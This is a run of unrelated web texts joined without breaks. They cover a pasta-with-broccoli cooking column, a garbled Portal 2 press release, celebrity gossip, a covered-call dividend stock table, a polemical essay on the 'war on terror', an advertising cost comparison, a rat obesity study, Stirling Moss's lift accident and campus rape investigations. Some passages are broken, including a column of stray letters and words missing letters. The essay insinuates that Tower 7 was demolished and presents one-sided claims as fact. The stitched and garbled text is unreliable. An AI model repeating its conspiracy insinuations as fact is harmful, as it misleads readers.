Here ’s how it goes :
Cook the broccoli and pasta in boiling water ( they cook together at the same time ) ; heat olive oil and garlic in a skillet ; combine .
Really , that ’s all there is to it .
But there can be more .
A lot more .
This dish is kind of a poster child for culinary flexibility .
I ’ve made it with broccoli , broccoli rabe and even Chinese broccoli .
It ’s great with kale .
You can add Italian sausage , salt pork , guanciale or prosciutto .
You can go meatless with olives and capers ( though this is even better with a few salted anchovies thrown in ) .
Last week , I made it with dandelion greens from my garden and a chunk of leftover Spanish chorizo cut in cubes ; that might have been my favorite combination of all .
So you get what I ’m saying ?
Let ’s start by examining some of the fundamentals .
In this case , the most important being the pasta itself .
You probably already know this , but dried pasta is not simply fresh pasta that ’s been left out too long .
Rather , it ’s a completely different animal .
Fresh pasta is made with soft wheat and eggs and has a slinky , slippery texture .
Dried pasta is made with hard wheat and water and is chewy and hearty .
It ’s like the difference between silk and wool , and both have their uses .
Dried pastas come in a wide variety of shapes ; some Italian purists will insist that each has only one ideal sauce that should accompany it .
That may be true , but for most purposes , the choice is much simpler .
Use long pastas ( spaghetti , fettuccine , etc. ) with sauces that have a creamy texture ( the sauce will cling to the noodle ) .
Use short pastas such as penne , farfalle and orecchiette with sauces that are chunky ( the bits of sauce will cling to the nooks and crannies ) .
Though dried pasta seems as basic and reliable as an ingredient can get , there are differences in quality between brands , but perhaps in a surprising way .
Tasted by itself , a really good dried pasta noodle may not seem all that much better than an ordinary brand ; but what it does is make the sauce taste better .
It ’s because of the ways the noodles are shaped ( bronze dies make rougher surfaces ) and dried ( long , slow drying is better ) .
That ’s Italian
As much as I would like to say that there are American brands that are as good as Italian , I have not found one yet .
And that is also true of pasta from Italian brands that are made in this country .
( To tell where a dried pasta was made , check the ingredient list .
Italian noodles are made of only flour and water .
If you see riboflavin or thiamine , no matter the brand name , the noodle was made in America . )
My favorite dried pastas are from such brands as Latini , Rustichella d’Abruzzo , Maestri and La Molisana .
They are more expensive than average brands , but we ’re still talking about dried pasta here :
For me , an extra 50 cents a serving is a small enough luxury .
If price is more important , both DeCecco and Barilla are fine .
( Check the labels : Both are made in the U.S. )
Whichever pasta you use , the basics of cooking it are the same .
The most important thing is that very big pot of very rapidly boiling water .
Noodles throw off starch when they ’re cooking , and if there is n’t enough water to dilute it , that starch turns into a gummy coating on the pasta .
Also , make sure the water is heavily salted -- that will season the noodle and keep you from having to add so much salt afterward .
Recipes always tell you to cook pasta until it is al dente , but they never tell you exactly what that means .
That ’s because it varies from person to person .
Fortunately , pasta is nothing if not adaptable .
Some people like their noodles cooked to the point that you can gum them ; pasta maker Carla Latini , who is so exigent that she and her husband Carlo make pasta from single varieties of wheat , likes her noodles cooked just long enough that they will bend into the pot ( perhaps a slight exaggeration ) .
To my taste , pasta should be cooked just to the point that when you cut through a noodle , there is no hard white thread of uncooked flour remaining .
At this point , the pasta is tender , but still chewy , which I suppose is about as good a definition of al dente as you ’ll find .
Over time , you ’ll learn to notice when the color changes from golden to pale straw , and you ’ll recognize that certain swelling and limpness that comes with a well - cooked noodle .
But until then , there ’s only one surefire way to find when pasta is done , and that ’s to taste it .
Pluck a single strand from the pot , using a long kitchen fork or a pair of tongs , let it cool slightly ( careful , hot ! ) , then pop it in your mouth .
As soon as it ’s done , drain the pasta in a colander ( having one of those colander inserts that fits inside your pot is a big help ) .
Do n’t rinse it !
Just shake off some of the excess water .
That was an awful lot of information for something as seemingly simple as dried pasta , but the noodles are the most important part of the dish .
After that , everything else is pretty straightforward .
You can even cook the broccoli or whatever greens you ’re using at the same time in the same pot in which you ’re cooking the pasta .
This is blanching -- cooking just long enough to make things tender .
The trick is figuring the timing , and that is based on the density of the vegetable .
Soft , leafy greens can be cooked in a minute or two ; tough , woody stems can take as long as the noodles do .
In fact , with broccoli , add the diced stems at the same time you start the pasta and then add the florets when there is only a minute or two left .
The only thing left to make is the sauce , which for this particular pasta is essentially just olive oil and flavorings .
This can be as simple as minced garlic by itself , or you can layer in other ingredients .
One obvious way to go is adding some kind of pork product , mainly because adding some kind of pork product will make almost anything taste better .
Italian sausage is good -- either sweet or hot .
Squeeze it out of its casing and break it into bite - sized chunks as you add it to the pan .
Flatten it slightly with your fingers to increase the surface area so it will brown better ( browned pork products are even better than plain pork products ) .
But remember that this sauce is really just seasoning .
Anything besides raw sausage -- salted anchovies , olives , capers , whatever you like -- needs only to be heated through .
Watch the garlic
The one thing you want to be careful with is cooking the garlic .
Do n’t let it scorch .
If you see it beginning to go from golden to brown , immediately pull the pan from the heat and add a spoonful of the pasta water to stop the cooking .
The final fillip in the sauce - making part of the recipe is adding a ladleful of the pasta cooking water back into the saucepan .
This accomplishes two things .
Because there is so much starch in the water , it slightly thickens the sauce .
More important , it marries the flavors of the sauce to the noodles .
To finish the dish , you just need a little cheese .
Parmesan is a natural , of course , but I prefer pecorino Romano , which has a sharp , slightly funky sheep ’s milk edge to it .
Grate the cheese if you want , but I like it better sliced off in thin shards with a vegetable peeler .
That way you get a nice , distinct bite , rather than little bits mixed in with everything else .
But you should try it both ways and make your own decision .
That ’s the beauty of learning to make a dish , rather than just following some recipe .
VARIATIONS ON A THEME :
The recipe calls for sausage , but prosciutto will work too .
Broccoli is a no-brainer , but try the Chinese kind for a change of pace .
Finally , you can go meatless with capers and olives , unless you want anchovies too .
russ.parsons@latimes.com
Just in time for Halloween , The Home Depot is selling a giant 12 - foot skeleton that features really creepy , animated LCD blue eyes that follow a person ’s movements around the yard .
The posable skeleton comes as a kit that is easily put together , can be staked to the ground , and runs …
d
r
a
t
t
m
a
n
n
h
0
n
e
e
Valve , creators of best - selling game franchises ( such as Left 4 Dea , Counte - Strike and Half - Life ) and ledingechnologies ( such as Seaand Source ) , tody annouced Portal 2 for shipment this comig holiday season .
Portal 2 is the sequel to 2007's Portal , wich won 7dustry achiment awards .
For more information , please visit www.steamgames.com
" Curb Your Enthusiasm " star Jeff Garlin says he would n't be caught dead on " The Tonight Show with Jay Leno " ... because he says Conan 's nemesis " has no character . "
During an interview with Jimmy Baron from 92.9 Dave - FM
Atlanta this weekend , Garlin -- a long time friend and former roommate of Conan O'Brien -- claims NBC was " stupid " to replace Leno with Conan in the first place ... but says Leno derailed Conan 's chances for success by doing the 10 o'clock show .
In an era of terrible CD rates , a lot of us are looking for relatively safe places to get a decent return .
Stable dividend stocks can provide a fair bit of return but of course they come with risk .
Generally when we look for dividend stocks , we 're not looking at the NASDAQ , however there are some good finds on that market .
In fact when using a technique to lower your risk , some of these stocks become very attractive .
The technique I 'm speaking of is selling covered calls .
If you 're not familiar with this technique , the ideas can be fairly complex and the article I 've referenced can help you .
The general idea is you sell someone the option to buy the stock from you at a given price over a given time .
By selling this option , you reduce your risk and cost - basis .
This , by implication , increases your yield .
Because the NASDAQ stocks tend to be a bit more volatile , their lower base yields can actually become quite attractive once you sell a call on them .
Of course in all these cases you have a significant downside risk and your upside is limited .
However this is a much more conservative approach than an " uncovered " position .
The Stocks
For the purposes of this comparison , I 've put together a list of stocks I think might be attractive from the NASDAQ for their dividends , or even better for selling covered calls on .
For the purposes of calculating the yield with a call , I 've assumed that we 're selling January 2011 calls with strike prices fairly near the current price ( usually the highest strike price that was lower than the current price ) .
Commissions were assumed to be $ 25 for the calls and the stocks , which may be very low depending on your broker .
I 've also assumed we 're buying 500 shares and selling 5 calls .
Most of these assumptions make a fairly minimal difference in the final yield however .
Stock Price Yield Yield With Call Break Even Price ADP $ 44.25 3.10 % 7.01 % $ 39.70 NTRS $ 54.81 2.10 % 7.01 % $ 46.72 PAYX $ 32.29 3.90 % 6.68 % $ 28.11 LLTC $ 28.49 3.30 % 7.07 % $ 23.35 ROST $ 54.21 1.20 % 6.92 % $ 46.78
Explaining the Columns
The columns are fairly self explanatory :
Stock is of course the ticker symbol .
is of course the ticker symbol .
Price is the closing price of the stock today
is the closing price of the stock today Yield is the current dividend yield of the stock .
is the current dividend yield of the stock .
Yield with Call is the yield assuming you are not called out until the expiration of your option given the parameters listed above .
Obviously this yield is not guaranteed and you could actually lose money .
is the yield assuming you are not called out until the expiration of your option given the parameters listed above .
Obviously this yield is not guaranteed and you could actually lose money .
Break Even Price is the price ( assuming the stock continues to pay the same dividend ) to which the stock would have to fall before you would lose money on this transaction .
Conclusions
While you do not usually think of NASDAQ stocks as being prime candidates for dividend investing , the situation gets much more interesting once the call options are included in the equation .
Interestingly each of these stocks winds up with a yield in the roughly 7 % area after selling a Jan 11 call on the stocks .
The determining factor for your level of risk should probably be the break even price .
In the circumstances listed above , LLTC would have to lose nearly 19 % of its value before you 'd start losing money , while NTRS would have to lose only about 10 % .
So your question in picking one of these stocks is : which is the least likely to reach its break - even price ?
For historians who like dates and bookends for their events , the “ global war on terror ” started with the destruction of the Twin Towers and the attack on the Pentagon ( 9/11 ) .
The idea of perpetual war provided large benefits to a few and pain and terror to much of the world , and to the rest of the world an increasing disbelief in the intents , means , and rationales for the war .
Unfortunately for the academic writers of history , history itself does not operate within the confines of given dates – the flow of actions and counter actions never ceases .
The 9/11 attacks were by any real accounting only another incident in the fraud that the imperial powers of the world have ‘ perpetuated ’ on the citizens of the world .
Rather than speak of war , which is an act of violence with many differing excuses and exercises , it is rather a perpetual fraud perpetrated by these self - acclaiming empires – fraud that goes beyond acts of war into the daily lives of citizens around the world – that is the basis for the crimes against humanity ( and the environment as a whole ) .
‘ Fraud ’ is defined as “ Criminal deception , use of false representations to gain unjust advantage ; dishonest artifice or trick ” with the addition of ‘ pious fraud ’ as a “ deception intended to benefit those deceived , and especially to strengthen religious belief . ”
Both of these definitions need to be applied to our current global situation .
Criminal deception has been used by various governments , notably the U.S. , Great Britain , and Israel , with the support of various sycophant allies , to try to gain advantage militarily and economically over much of the world .
This is combined with pious deception as those deceived to a great part are the citizens of those countries , with the aspect of religion being used to reinforce and support the overall criminal fraud .
The big lie
The big lie is simple , that there really is a global war on terror .
The truth is more realistically that there is a global war of terror .
Those self - righteous countries that proclaim against terror are themselves the greatest sources of terror around the world .
The United States has an ongoing history of occupations , invasions , covert and subvert activities against any nation that dare raise a voice that contradicted U.S. wishes and desires , most of which reflected the corporate agenda to control the natural resources and economies of the world .
Great Britain ’s empire ( along with most of the other European empires of Spain , France , Germany , Russia , the Netherlands ) produced terror and war wherever it was established .
In spite of its many proclamations of civilizing the savages of the world , the real intentions were the same , military and economic control of global wealth .
Its only ‘ success ’ , at least from the eyes of the invaders , were the colonies of Australia , New Zealand and North America ( U.S. and Canada ) , successful in that they eliminated any opposition from the indigenous people through the violence and terror of war and genocide .
Israel ’s empire is much more modest when considered in terms of occupying and settling territory for their own advantage .
All they have endeavored to gain has been the land between the Mediterranean Sea and the Jordan river , a desert land empty of people that they wished to make bloom with the fruits of their civilization and religion .
That ‘ empty land ’ however contained a significant indigenous population that was already successfully cultivating the land and had for millennia a distinct cultural environment .
The occupation of Palestinian territory fits both definitions of fraud , as a criminal activity against international law and most certainly as a pious deception based on an arguable fundamentalist belief that they and only they should occupy Palestine .
All three of these states , apart from the historical frauds of claiming lands and resources that were not their own , have extended this fraud into the much larger global war of terror .
Nuclear terror
A recent comment by Obama highlighted this fraud : “ Iran is not just a challenge for Israel .
I believe it is a challenge for the whole world .
I can hardly think of a stable world order with a nuclear Iran . ”
This fraudulent claim only extends the previous fraudulent claims that led to invasions of Iraq , Afghanistan , Pakistan ( okay , only aerial invasions so far , plus a whole bunch of covert operatives ) – for the U.S. the list is almost endless , but I will stay with current events for now – Lebanon , and Gaza .
“ A stable world order ” will never exist with countries carrying nuclear weapons .
The U.S. and Soviet Union perpetrated their lies and counter - lies for decades while maintaining overwhelming arsenals of nuclear weapons .
I for one did not feel any stability concerning international affairs during that period of my life – at any given moment of carelessness or rhetorical stupidity one country could easily have triggered a civilization - ending war .
That situation still exists .
Nuclear weapons are a grand deception for a ‘ stable world order ’ .
The U.S. is the main rogue state in this regard , maintaining its superiority in all areas of their nuclear arsenal .
India developed nuclear weapons outside the Non-proliferation Treaty ( NPT ) and the U.S. has recently worked with them in developing their nuclear industry and weapons even more .
Pakistan similarly developed weapons outside the NPT , and with its mainly Muslim population , and a government in conflict with India on many issues and subordinate to – yet resistant of – U.S. influence , is hardly stable .
Israel has an arsenal of an estimated two hundred nuclear weapons ( estimates can be made from the kind of reactors used and the availability of materials to fuel it ) that have never been questioned by the U.S. or its allies even though they are outside the nuclear proliferation treaty ’s bounds .
Somehow all this makes
Iran the greatest threat to a ‘ stable world order ’ ?
But nuclear weapons , as catastrophic as they may be , are really just another part of the overall deception .
The deception is there to hide the reality of U.S. corporate - military intentions to contain and control the majority of resources and peoples of the world as they can , to accumulate as much of the wealth and power as they can for the benefit of their own elites ( as part of the deception involves deceiving their own population . )
Beneficiaries
The current deceptions began before 9/11 .
The Project for a New American Century clamored for full spectrum dominance and included the statement , “ … the process of transformation , even if it brings revolutionary change , is likely to be a long one , absent some catastrophic and catalyzing event––like a new Pearl Harbor ” .
Arguments about 9/11 include ideas ranging from it being an inside piece of work , to being a truly successful terrorist attack that allowed the neocon PNAC writers their opportunity to strive for their objectives ( remembering that Pearl Harbor was not as ‘ surprising ‘ as the historians of the day proclaimed ) .
What rises is the question ( apart from all the questions about 9/11 itself ) of who benefits from it all ?
The main beneficiaries are the members of the international corporate world , the military establishments ( pretty much one and the same ) especially of the U.S. and Israel , and the politicians who support it all ( ditto ) .
With the U.S. economy riding a series of speculative bubbles while the real growth and wealth creating activities are shipped overseas , in particular to the rising economy of China , there is little in the way of home grown wealth left to be harvested ( other than the largesse of government bailouts to the banks and corporations and the largesse of government military contracts that support a wide array of industries related to military provisioning ) .
The “ global war on terror ” deception provides the excuse , the rationale , the motive , and most importantly the means , to extend U.S. corporate / political / economic control over the Middle East ( mostly , but because of its very broad definition , the war could go anywhere ) for its natural resources ( mainly oil and gas ) at the same time attempting to contain and counteract the rising influence of China and the ongoing interests of Russia in the region .
Israel is quite happy to benefit along with all this .
Riding on the U.S. stagecoach of spreading freedom and democracy at the end of a gun-barrel so that U.S. corporations can continue to rake in the wealth … but wait a minute … with corporate and political leaders in the U.S. bowing obsequiously to the Israelis , from Obama to Jimmy Carter ( whose letter of apology to the Israelis came as his grandson was running for a Georgia senatorial seat ) perhaps Israel is not riding on the stage coach but is riding with reins in hand while the U.S. rides shotgun on their own coach .
The U.S. has contributed enormously to Israel , both financially and militarily .
The relationship is not all smiles and roses , but the strength of the Israeli lobby and the apparent U.S. desire to maintain Israel as its forward military garrison at the western end of the Middle East keeps the U.S. establishment under Israeli manipulation , if not outright control .
The manner in which Netanyahu has bested Obama indicates that perhaps the latter word is the operative one .
Casualties
The casualties in this global war on terror can be classified in various ways : religion , environment , the economy , the citizens of most countries , the ideas of democracy and freedom , peace , and health .
They can and usually are also classified as national peoples or states , with Palestine , Iraq , Afghanistan , and Pakistan being the current crop of nations struggling under the war of terror .
Arguably the single biggest casualty is to the Palestinian people .
Israel , with the acceptance of the majority of the governments of the world , has occupied the West Bank for over forty years , destroying farms , communities , families , lives , culture – most anything it can about being Palestinian .
Given an historical democratic election in 2006 , accepted as such by the majority of the world , the U.S. and its allies quickly denounced the results and created a situation that destroyed the democratic outcomes .
The occupation continues under Israel ’s reign of terror , with the added impetus of the global war on terror as an excuse to continue with its methods – most if not all considered illegal under international law .
Similarly , the Gaza strip , more correctly the Gaza ghetto , contains about 1.5 million Palestinians living in conditions of severe deprivation , under the confinement of the Israeli military , again having the war on terror as an additional excuse to subjugate and terrorize the population , again all against the standards of international law .
The world remains complicit with this .
All governments that support the U.S. in their actions , members of NATO or otherwise are part of the fraud controlled by U.S. interests and U.S. media conglomerates ( the latter part and parcel of the military corporate structures ) .
Canada has recently stopped supporting UNRWA , “ but [ the aid ] is now being redirected in accordance with Canadian values . ”
Theoretically the funds are being specifically targeted for “ training prosecutors , judges and police , and shoring up the Palestinian judicial sector by building courthouses , ” in the West Bank .
What this amounts to is Canada accepting Israel ’s position vis a vis Gaza and Hamas and directing the aid money to the compliant Palestinian Authority of the West Bank , now in the process of eliminating their Hamas opposition – no aid for refugees , only for sources supporting Israeli intentions .
Canadian values , at least at the government level , have fallen in line with U.S. and Israeli values .
On the other hand , it could be argued that Iraq is the single biggest casualty , based on the number of exiles , the number of civilians killed , the degree of environmental damage from the oil sector , depleted uranium munitions , and the general chaos of warfare .
Under the pretenses of weapons of mass destruction ( such as the U.S. has in abundance ) , alliances with al - Qaeda , and the nasty nature of Hussein , Iraq became the first victim of occupation in the war of terror .
With no WMDs and only a limited al - Qaeda presence after the invasion , Iraq ’s situation remains one of an illegally occupied country destabilized by the many diverse political , religious , and natural resource riches of the region .
Afghanistan was supposedly the origin of the 9/11 attacks ( what about Saudi Arabia ? ) , and has suffered incredible hardships under the terror perpetrated by the U.S. Certainly the Taliban were not angels of mercy , but they did bring stability to a region that had been reduced to warlordism .
And in spite of U.S. arguments otherwise , there were several opportunities to kill or sequester bin Laden .
Supposedly operating under a UN mandate for reconstruction and rehabilitation , the U.S. / NATO forces are essentially there to create more space for U.S. control of oil and gas and the ongoing encirclement and containment of Russia and China .
The use of torture , the lack of protection for civilians , and their purposeful murder within the context of the war create a situation – the illegality of the occupation in the first place not withstanding – that goes against international humanitarian law and war law .
As the U.S. dominoes tumble , Pakistan became the next target on the list .
Unstable from its inception , created with artificial boundaries that cut through tribal regions ( all the Middle East boundaries are artificially created by the European empirical powers – save Iran ) .
Ostensibly an ally of the U.S. in the war of terror , Pakistan is becoming increasingly destabilized as U.S. covert operations and drone attacks extend U.S. power over the country .
Fearful of its nuclear power , fearful of its Muslim population , fearful of its base for insurgents in Afghanistan , the U.S. is trying both military and political maneuvering to control the country .
Iran is obviously being set up as the fourth country to be subjected to an illegal U.S. or Israeli attack .
All the same precedents are there : the false accusations concerning nuclear weapons ( with the obvious irony that the U.S. and Israel consistently act outside the intent of the NPT ) , the demonizing of the government , the tales of terror being flung far and wide from the country ( certainly Iran is supporting its military interests in the region , but not with the degree of terror imposed by the U.S. ) , and the calls for democracy and freedom , ideas which more and more are inimical to both the U.S. , its allies , and Israel .
Other casualties
Other casualties are of the ideals of the world , of the freedom , democracy , of religious beliefs in all the main religions combined with the hard reality of environmental destruction , topped up with an economic recession based on global finances that vacuum up the wealth of the many rather than trickle down the wealth of the few .
All the major monotheistic religions have beliefs that call for caring for the environment , caring for the poor , the down - trodden , for aiding and helping humanity through love and compassionate caring .
As a casualty of the war of terror , the fundamentalist beliefs of these religions have risen to the surface , advocating hatred , creating an evil other who is to be disposed off without concern or emotion , negating the compassionate side of the religions .
The environment obviously suffers from the direct impact of war , with the ongoing contamination from the many chemicals used in the fighting and the destruction of civilian infrastructure used to control the environment for human use .
This applies not only to the occupied war torn territories , but also the territories where the resources are extracted from to continue the war , and the communities where the war provisioning industries are located .
Perhaps the biggest casualty in this grouping is that of democracy .
The nominative democracies that perpetuate the war are increasingly subordinate to a wealthy elite who control the media , the message , and who have created the legislative support to spy on and detain their own citizens without the rights of a truly democratic society that citizens have fought for over the centuries .
Canadian and U.S. troops are now importing ‘ democracy in a box ’ into Marjah near Kandahar .
If they can do it there , they should consider doing it in Ottawa and Washington .
Questions
Through all this , many questions circulate around the war of terror events .
All of them are treated dismissively as conspiracy theories by the governing elites , with the intentions that the questions will be both ignored and be considered either unpatriotic or ignorant or both .
So with hesitation , I have to reiterate what I see as the more valid questions , that if answered fully may or may not convince me to change my viewpoint .
First and foremost , where is bin Laden ?
For all the vaunted prowess and all - seeing eyes of the various U.S. / Israeli / U.K. spy agencies , and the supposed skills of their special ops teams , why have they not found bin Laden ?
They had him in their sights for a decade or so before 9/11 , they assisted him ( and others ) in Afghanistan to give a body blow to the Soviets , and then suddenly after 9/11 he disappears from view except for the occasional video tape … ?
Surely for all their skills and prowess and the huge sums of money they are willing and capable of throwing around to enemies and allies alike , the U.S. must know his whereabouts if he is still alive .
Dead or alive , it really does not matter , as long as he is not proven to be one or the other .
For an illegal war based on false pretenses , it is good to have a bogeyman hidden in the mountains of some far away place that is essentially inaccessible to most if not all prying eyes .
The fear that can be promoted by having these occasional videos presented at propitious moments can only aid the ongoing promulgation of the war of terror .
Many question have arisen around the events of 9/11 itself , and increasingly more and more mainstream scientists , architects , and pilots are questioning the official version of events .
Is it a conspiracy theory ?
No , no theory is being applied , the questions are being applied to specific points .
There are three questions that have been brought forward that I would like to have answered .
First , why did Tower 7 collapse as if it had been ‘ pulled ’ for demolition ?
What forensic evidence is there to support the Pentagon airplane attack ?
And why did all the materials from what is purportedly an international crime site be removed and not held for future prosecution ?
The fraud continues
What supposedly began with 9/11 may well be a never ending story , at least for the foreseeable future .
The U.S. is mired in an economic morass that has it tied to the rising power of China at the same time that its military empire is violently expanding and exercising its self - applied unilateral right to strike anywhere anytime in the name of terror .
It is an empire on the wane economically , but as I feared earlier , it is going out with a bang rather than with any intent of reconciliation .
Israel is increasingly hard - line in its pursuit of settlements and territorial advantage over the Palestinians .
Iraq , Afghanistan , and Pakistan are subjugated under the occupation of U.S. intentions for resource control and political containment .
Iran is increasingly looking like the next excuse to extend this military dominance and control .
Unfortunately so far all outcomes have generally been unexpected , and the war of terror has not done any good for any region of the world .
Environmental concerns , economic concerns , human culture and societies have all suffered because of the artifices of creating an ephemeral enemy that can never be captured , therefore creating a war that will be a perpetual fraud .
Posted on 31 .
Mar , 2010 by Robert Steers in Advertising , Marketing , Social Media
We have updated this post to include more social media advertising here .
Advertising is becoming the key way for social networks / aggregators to make money .
The lure for advertisers is , they can target genuinely interested customers by placing the ads in relevant sections .
As social networks and media mature , their audience size is beginning to exceed traditional media .
There are a multitude of dangers in using social media and aggregators for marketing and advertising , but these are no worse than the dangers associated with advertising on a major news website .
Every advertising medium is unique and has its own benefits .
Below we took all the information we could find on advertising through particular online media to provide a comparison .
For each website , we took one campaign and an average of other information we found online .
Digg.com Reddit.com Facebook.com smh.com.au Google Adwords Startup Cost $ 20 $ 20 $ 50,000 $ 20 Cost for the
Campaign $ 40,000 $ 20 $ 37.23 $ 50,000 $ 34.80 Unique
Impressions 2800000 19,303 454,294 8500000 76,434 CPM
$ 14.28 $ 1.036 $ 0.82 $ 5.8 $ 0.45 Clicks ( 280 ) 196 49 ~ 800 48 Click through
( Site Average ) .01 %
( .01 % – 5 % ) 6.49 % .01 %
( 0.01 – 0.05 % ) .01 % 0.06 % Cost Per
Click ( 142 ) 0.10 ~ 0.76 $ 62 $ 0.72 Sources 1 ] [ 2 ] [ 3 ]
1 ] 1 ] [ 2 ] +
Own data Own Data Own Data Target Level Category Home ( 50 options )
Any subreddit ( hundreds ) keyword targeting section targeting keyword targeting
The data available on each online advertiser was sparse to say the least .
Every source we found had different ranges for “ average ” click through rates on each website .
In the end , we included some of our own data to give a more complete picture .
Our assessment of the situation is as follows ;
Digg.com –
Most data we could find indicated that it is VERY expensive to advertise on Digg for the amount of click - through you get .
It appears they are running their costing closer to the online newspapers ’ model of charging per impression .
The major benefits and risk to advertising on social networks is you can get a community discussion about your ad or product .
On Digg , this is harnessed by allowing advertising costs to come down if your ad receives a certain number of votes .
Digg is the largest social aggregator on the web , so it attracts a very large and diverse audience .
It may be worthwhile to advertise on Digg as an alternative to TV or online Newspaper advertising , because the audiences are similar .
Conversly though , it appears , it could cost less to write decent content and submit it to this social aggregator , rather than advertise directly .
IDEAL FOR : Games manufacturers NOT IDEAL FOR : Car manufacturers
Reddit.com –
The information we could find about Reddit showed it was excellent value on a cost per click basis .
However it appears that the audience on Reddit is significantly smaller than other media .
By all accounts you are advertising to college - going , bacon loving twenty - somethings with no money .
This significantly narrows the number of potential advertisers for the site .
However , if you are advertising a new Star Wars convention , or you are promoting a T - Shirt of a narwhal eating the Kevin Rose , you may be in the right area .
With thousands of subreddits available , you can pretty much name your target .
If you want to advertise to the 2000 odd subscribers to the Doctor Who subreddit , then this may be the way to go .
IDEAL FOR : Magic : The Gathering wholesalers NOT IDEAL FOR : Toothpaste producers
Facebook.com – Currently the advertising network in Facebook is somewhere between Digg and Google , both in terms of size and cost .
You can target based on a wide range of criteria including location and keyword .
However the click through rate is relatively low .
We guess this is because the “ targeting ” system is not nearly as good as you would find on Google .
Just because a profile says the words “ football ” as an interest , does not mean I am looking for anything to do with football right now , or even that I really like the game .
The audience on Facebook is still expanding , however the targets are still the younger demographic .
IDEAL FOR : Get Rich At Home schemes NOT IDEAL FOR : Photocopier salesmen
SMH.com.au ( and other comparable newsosaurs ) – The Sydney Morning Herald is one of the most visited news websites in Australia .
It still has one of the most active online ad networks of any internet news media .
However , as with other Newsosaurs , it still justifies its rate card by impressions / views .
This may be fine for banks and car manufacturers that are looking to justify their branding spending by the number of people who see their logo .
However most small and medium businesses would find the campaigns grossley under - perform compared to an online advertising campaign .
Even when the ads on the website are matched with ads in their newsletters , the level of targetting and the activity associated will not satisfy most small advertisers .
IDEAL FOR : Telcos and Car Manufacturers NOT IDEAL FOR :
The manufacturers of Civ V
Google Adwords –
The online advertising behemouth is the model on which all other online advertising is measured .
The major benefits include targetting keywords and phrases , as well as reaching people when they are ready to buy .
The downsides to Adwords are not so often talked about .
Adwords are creeping up in cost in many competitive categories .
Some advertisers expect to spend $ 5 to $ 10 per click , which puts some advertising out of the reach of those with a small budget .
Also the deliberate or accidental click fraud is on the rise , as more competitors or adword spammers click on ads placed in valuable keywords .
To get a reasonable return advertisers should be expected to start with spending at least $ 100 and spread the load into keywords that are less commonly used .
Having said that , however , some markets are still untouched , and a large number of keywords have no competition at all .
IDEAL FOR : The local Pilates instructor NOT IDEAL FOR : A startup webhost
If you have any experience advertising on social networking or news websites , we would love to hear from you !
WASHINGTON ( Reuters ) - Bingeing on high - calorie foods may be as addictive as cocaine or nicotine , and could cause compulsive eating and obesity , according to a study published on Sunday .
Chocolate bars are pictured in the employees ' supermarket at the Nestle headquarters in Vevey February 19 , 2009 .
REUTERS / Denis Balibouse
The findings in a study of animals cannot be directly applied to human obesity , but may help in understanding the condition and in developing therapies to treat it , researchers wrote in the journal “ Nature Neuroscience . ”
The study , involving rats , found that overconsumption of high - calorie food can trigger addiction - like responses in the brain and that high - calorie food can turn rats into compulsive eaters in a laboratory setting , the article said .
The scientists also found decreased levels of a specific dopamine receptor -- a brain chemical that allows a feeling of reward -- in overweight rats , as has been reported in humans addicted to drugs , the article said .
“ Obesity may be a form of compulsive eating .
Other treatments in development for other forms of compulsion , for example drug addiction , may be very useful for the treatment of obesity , ” researcher Paul Kenny of The Scripps Research Institute in Florida said in a telephone interview .
Obesity - related diseases cost the United States an estimated $ 150 billion each year , according to U.S. federal agencies .
An estimated two - thirds of American adults and one - third of children are obese or overweight .
For the study , Kenny and colleagues headed to the grocery store .
“ We basically bought all of the stuff that people really like -- Ding - Dongs , cheesecake , bacon , sausage , the stuff that you enjoy , but you really should n’t eat too often , ” he said .
They also bought healthy foods and devised a diet plan for three groups of rats .
One group ate a balanced healthy diet .
Another group received healthy food , but had access to high - calorie food for one hour a day .
Rats in the third group were fed healthy meals and given unlimited access to high - calorie foods .
The rats in the third group developed a preference for the high - calorie food , munched on it all day and quickly became obese , Kenny said .
The rats in the experiment had also been trained to expect a minor shock when exposed to a light .
But when the rats that had unlimited access to high - calorie food were shown the light , they did not respond to the potential danger , Kenny said .
Instead , they continued to eat their snacks .
“ What we ’re seeing in our animals is very similar to what you ’d see in humans who overindulge , ” he said .
“ It seemed that it was okay , from what we could tell , to enjoy snack foods , but if you repeatedly overindulge , that ’s where the problem comes in . ”
Sir Stirling
Moss suffered a serious accident at home over the weekend when a lift malfunction at his house resulted in the doors of the lift opening when it was at a different floor .
Sadly , Sir Stirling fell three floors inside the lift shaft and suffered two broken ankles and several other broken bones in the foot .
There was some damage to his vertebrae but not internal injuries .
He was admitted to the London Hospital and then moved yesterday following the intervention of Professor Sid Watkins to the Princess Grace Hospital , where he was operated upon .
It is hoped that he will be moved out of the Intensive Care Unit later today and Lady Moss reports that he is in remarkably good spirits and already complaining about the size and quality of the hospital breakfast .
Moss ( 80 ) is always considered to have been the greatest F1 driver never to win the World Championship .
he raced in F1 between 1954 and 1962 , when his career ended with a bad crash at Goodwood .
He suffered serious head injuries .
He was knighted for his extraordinary service to the sport in January 2000 .
Moss is best remembered for his behaviour in 1958 when his sporting attitude cost him the World Championship when he stood up for rival Mike Hawthorn , who faced a penalty in Portugal that would , in retrospect , have denied him the points that he needed to beat Moss .
Stirling never for one moment entertained any thought of gaining an advantage in such a way , and in any case his natural sense of justice would not have allowed him to see Hawthorn unjustly penalised .
So he stepped forward to defend him .
Hawthorn subsequently went on to beat Moss by a mere point , even though he had only won one race that year to Moss ’s four .
That was sufficient to make Mike Hawthorn Britainís first World Champion .
The latest in a series of disturbing reports on campus assault found that colleges and government agencies alike often botch rape investigations .
One solution may be to keep rape from happening in the first place .
Advertisement
Today 's report by Kristin Jones of the Center for Public Integrity , the same organization that found in December that over 95 % of college rape victims never report their assault , tells the story of University of Wisconsin rape victim Laura Dunn and her failed attempts to get justice first from her school , and then from the U.S. Department of Education .
Dunn was raped by two teammates ( she rowed crew ) in April 2004 .
In July 2005 , she became one of the 5 % of victims who do report their rapes .
Her university then took nine months to investigate — including waiting two full months before interviewing one of the suspects — and then filed no charges .
Dunn then took her case to the Dept. of Education 's Office for Civil Rights , which is empowered to enforce students ' right to fair treatment in sexual assault cases as part of Title IX .
Dunn said , " I really expected for an organization that puts civil rights in their name to understand " — but even though Wisconsin 's delay had given one of Dunn 's attackers time to intimidate her at a party , the OCR found " insufficient evidence " of any wrongdoing .
" It was pretty devastating , " Dunn says .
Advertisement
Unfortunately , she 's not alone .
Out of 24 investigations between 1998 and 2008 , the OCR found violations of Title IX in just five .
And of those five , none of the schools were actually punished .
Jones writes that critics feel " OCR 's enforcement of how schools handle Title IX cases involving alleged sexual assaults is overly friendly , which ultimately lets colleges - and rapists - off the hook . "
